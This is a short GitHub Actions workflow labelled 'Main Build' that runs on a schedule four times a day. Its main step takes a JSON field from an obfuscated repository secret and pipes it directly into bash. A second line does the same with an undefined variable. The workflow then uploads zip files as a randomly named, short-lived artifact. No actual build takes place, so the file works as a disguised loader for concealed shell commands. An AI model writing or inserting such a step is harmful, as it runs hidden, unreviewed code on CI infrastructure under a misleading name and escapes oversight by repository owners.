name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '43 4,10,16,22 * * *'
env:
  CI: true
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          b443: ${{ secrets.b443 }}
        run: |
          printf '%s' "$b443" | jq -r .h29 | /bin/bash
          echo $fd7 | jq -r .q708 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: rHgWlhvk
          path: "*.zip"
          retention-days: 1
